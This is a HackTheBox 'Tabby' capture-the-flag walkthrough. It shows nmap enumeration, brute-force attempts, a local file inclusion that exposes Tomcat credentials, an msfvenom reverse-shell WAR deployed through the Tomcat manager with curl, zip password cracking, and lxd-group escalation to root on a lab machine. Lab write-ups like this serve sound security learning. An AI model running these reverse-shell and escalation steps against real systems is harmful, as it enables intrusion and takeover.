Tabby Walkthrough
Hey folks, Here we come back again to continue HackTheBox machines series with âTabbyâ machine, before we get started letâs take a look at the machine's info
As you can see itâs easy but in my opinion, it should be medium because it has in every step something new and seems to be hard for beginners, letâs get startedâŚ
We will work on it without
Metasploit
As usual, we will begin our walkthrough with nmap scan to get all open ports and service running on them, letâs perform a standard scan
nmap -A -T4 10.10.10.194PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache TomcatWe have 22/80/8080 are open and services apache 2.4.41 / openssh 8.2p1 /apache tomcat so what we will do ?
Try to search for exploits in
apache 2.4.41by usingsearchsploittoolTry to brute-force
sshcredentials by usingnmap scriptsandbrutespraytoolTry to brute-force
tomcatcredentials by usingmetasploitandnmap scirptsTry to enumerate websites at
10.10.10.194:80and10.10.10.194:8080and content discovery by usingdirbuster/dirsearch/ffuf/gobuster
Letâs startâŚ
Enumeration
We will try to enumerate the services to get the misconfigurations and vulnerabilities.
Public exploitation
Iâve searched for public exploitation in exploit-db and rapid-7 and public websites for exploitation for apache 2.4.41 / openssh 8.2p1 but unfortunately nothing we found
For Tomcat we found exploitation at rapid-7 and exploit-db but we must know tomcat credentials and the manager path, so we will need it later not now
SSH Credentials
Iâve brute-forced ssh credentials by using nmap and brutespray but nothing useful!!
Tomcat login credentials brute force
Iâve brute forced the credentials but also nothing useful, we used metasploit
Check the method at Metasploit
Website Enumeration and content discovery
At first I will open 10.10.10.194:80
Nice, we have a website that seems like more websites in real life, and it seems like hosting websites so letâs discover it and check its source code
While checking the source code we found this link megahosting.htb/news.php?file=statementâ so we need to add this domain megahosting to the /etc/hosts by adding it like this line to the /etc/hosts file
10.10.10.194 megahosting and then we will access the upper link
letâs search for megahosting exploit as Google, it may be affected by custom exploitation.
We have found this one
Exploitation
Until now we donât know our version, so letâs try this exploit in the upper link megahosting.htb/news.php?file=statementâ
Good, itâs vulnerable also.
Letâs try to get any information from tomcat directories, it may have sensitive information
After some enumeration, Iâve found a bunch of directories in these links
and also search for the tomcat-users.xml location file and found it in them, so letâs try to open all of them by using burp intruder or anything else
/var/share/tomcat9/etc/tomcat-users.xml is available and has credentials for the admin-gui and manager-script so letâs take these credentials and try to upload a reverse payload
Note: one of the privileges of admin-gui and manager-script is to deploy files on the server, so we will create a reverse payload and then deploy it
reverse shell payload â msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.wardeploy your payload â curl --upload-file <path/to/shell.war> "http://megahosting:8080/manager/deploy/text?path=/shell&update=true"and then you can access it by open nc <port-number> and access the webpage megahosting:8080/shell
So for now weâre into the server but not in the user role, so letâs discover our privileges by opening the uses directories
We canât open the user directory, so letâs try to get more privileges by searching for any important directories or files
After some enumeration, I found this backup file in /var/www/html/files
So I will try to download it on the local machine and look at its content
We will transfer it by opening a server on the vulnerable machine and accessing it from the attack machine
Vulnerable machine > python3 -m http.server 80Attack machine > wget http://10.10.10.194:80/backup-file-name
Now we have it on our attack machine, letâs try to unzip it by unzip file-name
Itâs protected by a password, so you can use hashcat or john the wripper to crack the password, Iâll use fcrackzip because it doesnât take much time
And we have the password admin@it
After trying to unzip the file I found nothing useful inside it so letâs use the password in other way
Letâs try to use it to login as ash user â su ash and insert this password
Good we have more privileges now but not the user privileges so letâs grab the user.txt first
Good, for now letâs try to find anything led us to the root access.
If you noticed the ash user is in lxd group
So after some google searching about how to use this role to be a root user, Iâve found an awesome resource to do it
Before we follow this resource letâs get first interactive shell because it will not work on the normal shell
python -c 'import pty; pty.spawn("/bin/bash")'It will get you in the interactive shell to be manage to access lxd then do as this man do exactly
As you will find in the upper link Iâve downloaded the tar file and transfer it to the vulnerable machine as you can see
After that, I compiled it on the victim machine and create an image
The final step is to access the image which we create
Letâs get our root.txt from the root directory
Thereâs nothing in this directory
It seems that heâs kidding me :)
Letâs search for the flag in all directories
After some search, Iâve found â¤
Last updated